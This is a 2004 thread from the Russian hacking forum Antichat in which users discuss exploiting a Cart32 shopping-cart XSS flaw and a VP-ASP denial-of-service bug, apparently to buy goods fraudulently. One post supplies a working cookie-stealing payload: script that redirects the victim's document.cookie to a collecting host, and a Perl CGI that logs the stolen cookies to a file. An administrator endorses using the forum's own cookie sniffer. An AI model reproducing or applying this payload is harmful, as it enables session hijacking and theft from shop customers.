Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

15.09.2004, 15:46
|
|
Новичок
Регистрация: 15.09.2004
Сообщений: 11
Провел на форуме: 0
Репутация:
0
|
|
как реальзовать данную уязвимость шопа
scripts/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>
для получения полезного
|
|
|

16.09.2004, 12:36
|
|
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме: 293464
Репутация:
42
|
|
Дай полный адрес
|
|
|

16.09.2004, 17:54
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме: 4618051
Репутация:
45
|
|
PUMA, а смысл использовать xss, если это подействует только на тебя ?
|
|
|

16.09.2004, 20:52
|
|
Новичок
Регистрация: 15.09.2004
Сообщений: 11
Провел на форуме: 0
Репутация:
0
|
|
стукните кто разбирается баг нераспространённый
не хочу чтоб в массы вышел...
|
|
|

17.09.2004, 12:25
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме: 2050916
Репутация:
0
|
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td> Цитата (PUMA @ сентября 15 2004,15:46)</td></tr><tr><td id="QUOTE">scripts/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS'  </script>[/QUOTE]<span id='postcolor'>
По-моему от таких уязвимостей толку - ноль...
Этот скрипт срабатывает только у того, кто отправил данный запрос... Какой в этом смысл ?
|
|
|

17.09.2004, 14:23
|
|
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме: 293464
Репутация:
42
|
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (PUMA @ сентября 16 2004,20:52)</td></tr><tr><td id="QUOTE">стукните кто разбирается баг нераспространённый
не хочу чтоб в массы вышел...[/QUOTE]<span id='postcolor'>
Да))) Баг действительно нераспространенный) Скажу больше, это даже не баг фактически. Скрывай его дальше
Потом продашь кому-нибудь.
Ну а если по существу, можно конечно найти этому применение, только вероятность совсем невелика. Тем более, чтобы найти уязвимость, нужно хотя бы сами куки для начала посмотреть, и личный кабинет юзера, поэтому и спрашивал полный УРЛ
|
|
|

20.09.2004, 02:59
|
|
Новичок
Регистрация: 15.09.2004
Сообщений: 11
Провел на форуме: 0
Репутация:
0
|
|
ну вот можно купить чтонибудь ///
а вот ещё один ктонибудь сможет реализовать ?
VP-ASP 'shoprestoreorder.asp' May Let Remote Users Keep Database Connections Open
A denial of service vulnerability was reported in VP-ASP. A remote user can consume database resources on the target system.
The vendor reported that a remote user can restore a previous order using 'shoprestoreorder.asp' to potentially cause a database connection to stay open. The vendor indicates that this can cause performance issues.
Impact: A remote user may be able to cause database connections to stay open.
Solution: The vendor has described a fix for 'shoprestoreorder.asp':
|
|
|

09.10.2004, 04:42
|
|
Новичок
Регистрация: 09.10.2004
Сообщений: 4
Провел на форуме: 0
Репутация:
0
|
|
А если по-думать головой?
<script>document.location.href=' http://target.com/cgi-bin/cookie.cgi?' + document.cookie;</script>
(cookie.cgi)
#!/usr/bin/perl -w
open COOKIES,">>../cookies.txt";
print "Content-Type: text/html\n\n";
print COOKIES "----------- new cookie -----------\n";
print COOKIES "$ENV{'QUERY_STRING'}\n";
print COOKIES "---------- end of cookie ---------\n\n";
close COOKIES;

|
|
|

09.10.2004, 18:47
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме: 4618051
Репутация:
45
|
|
acidhack, это примитивный вариант скрипта снифера ... Лучше использовать наш ... Да и не факт, что кукисы будут полезны ...
|
|
|

06.11.2004, 09:13
|
|
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме: 5619724
Репутация:
2944
|
|
acidhack - Мне типа слово "COOKIES" напоминает кучку маленьких пирожков 
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|